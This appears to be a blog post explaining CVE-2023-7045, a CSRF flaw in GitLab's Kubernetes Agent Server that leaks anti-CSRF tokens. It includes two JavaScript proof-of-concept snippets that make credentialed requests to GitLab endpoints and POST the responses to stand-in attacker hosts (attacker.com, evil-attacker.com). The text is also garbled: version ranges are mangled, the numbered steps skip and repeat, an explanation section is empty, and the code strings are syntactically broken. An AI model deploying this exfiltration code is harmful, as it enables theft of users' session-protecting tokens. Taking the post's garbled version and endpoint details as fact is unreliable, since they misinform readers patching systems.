CVE-2023-7045 - How a CSRF Flaw in GitLab Let Attackers Steal Anti-CSRF Tokens via Kubernetes Agent Server

In late 2023, a critical security vulnerability—CVE-2023-7045—was found in major versions of GitLab Community Edition (CE) and Enterprise Edition (EE). Spanning from version 13.11 up to 16.10.6, 16.11 up to 16.11.3, and 17. up to 17..1, this vulnerability impacted thousands of organizations worldwide. If you’re running a self-hosted GitLab and use the Kubernetes Agent Server (KAS), you might be at risk—unless you’ve patched.

This deep-dive will explain, in simple terms, what happened, how it works, and how an attacker could use this Cross-Site Request Forgery (CSRF) flaw to steal sensitive security tokens, potentially leading to more severe breaches.

What is CVE-2023-7045?

CVE-2023-7045 is a CSRF vulnerability in GitLab’s Kubernetes Agent Server (KAS) integration that allows a malicious external site to trick a logged-in GitLab user’s browser into sending requests to GitLab, ultimately leaking the user’s anti-CSRF tokens.

Anti-CSRF tokens are meant to stop CSRF attacks by making sure that every request you send from your browser to the server includes a secret value that only your browser and the server know. If an attacker grabs this token, they can perform CSRF or even gain further access to your sensitive data.

A Short Primer on CSRF and Anti-CSRF Tokens

- CSRF (Cross-Site Request Forgery): An attacker tricks your browser, while you’re logged in to a service, into sending requests you didn’t intend—letting them perform actions under your name.
- Anti-CSRF Tokens: Random strings given to your browser by the site you’re using; they must be sent with each action, blocking blind CSRF attacks.

If the attacker can steal these tokens, all bets are off.

1. Weak Validation in KAS

KAS is a GitLab component designed to interact between your GitLab instance and Kubernetes clusters. It runs as a standalone service. The vulnerable code did not properly validate or separate requests coming from legitimate users versus cross-domain attackers.

2. Browser’s Cookie Sharing

Because GitLab uses cookies to manage authentication (like most web apps), your browser sends those cookies *whenever* you make a request to your GitLab server, including requests triggered unknowingly by JavaScript from another site.

3. CSRF: Luring the Victim

An attacker crafts a malicious website. When a GitLab user, logged into GitLab, visits that site, the attacker's JavaScript silently sends requests (for example, via fetch or XHR) to the victim’s GitLab *KAS endpoints*.

// Malicious Website
fetch('https://gitlab.victim.org/-/kubernetes-agent/api/v1/some_endpoint';, {
    credentials: 'include'
})
.then(response => response.text())
.then(data => {
    // Exfiltration logic
    fetch('https://attacker.com/collect';, {
        method: 'POST',
        body: data
    });
});

4. Extracting the Token

If KAS endpoint leaks anti-CSRF tokens in error messages, responses, or headers, these can be parsed and exfiltrated by the attacker’s site.

Browser automatically sends session cookies (and potentially other security headers).

5. Response from GitLab/KAS contains anti-CSRF token due to the bug.

Script reads and forwards this token to the attacker’s own server.

7. Attacker reuses the token to perform further attacks (like changing account email, deleting repos, or escalating privileges).

Token theft: Anti-CSRF tokens are the last line of defense against CSRF.

3. Admin impact: If the victim is an admin, attacker could completely compromise your GitLab instance or connected Kubernetes clusters.

Who Was Affected?

- GitLab CE/EE 13.11 before 16.10.6
- GitLab CE/EE 16.11 before 16.11.3
- GitLab CE/EE 17. before 17..1

If you haven’t updated—do it NOW.

- Official GitLab security release covering the patch.
- GitLab Advisory for CVE-2023-7045

17..1

If you can’t update (not recommended!), disable the KAS integration or restrict access to the KAS endpoints until you patch.

Below is a minimal proof-of-concept using JavaScript to target a vulnerable KAS

// Attacker's site JavaScript
window.onload = function() {
    fetch('https://gitlab.yourdomain.com/-/kubernetes-agent/token';, { credentials: 'include' })
      .then(resp => resp.text())
      .then(tokenData => {
          // Exfiltrate the anti-CSRF token
          fetch('https://evil-attacker.com/steal';, {
              method: "POST",
              body: tokenData
          });
      });
};

What this does:

References and Further Reading

- NVD Record for CVE-2023-7045
- Original GitLab Release Post
- GitLab Advisory List

Conclusion

CVE-2023-7045 is another reminder: even well-known and trusted software can contain overlooked vulnerabilities. If you run a GitLab installation, especially if you use Kubernetes Agent Server, patch ASAP.

Don’t let an attacker borrow your trusted tokens—keep your software up to date!

Stay secure! If you operate community projects or production environments, check your version, review your security settings, and patch KAS vulnerabilities as soon as updates are available.

If you want a technical deep-dive into how we discovered and responsibly disclosed this bug, or want to learn more about defending against CSRF and similar threats, drop your comments below or follow our blog for further updates.

Timeline

Published on: 05/23/2024 11:15:23 UTC
Last modified on: 05/24/2024 01:15:30 UTC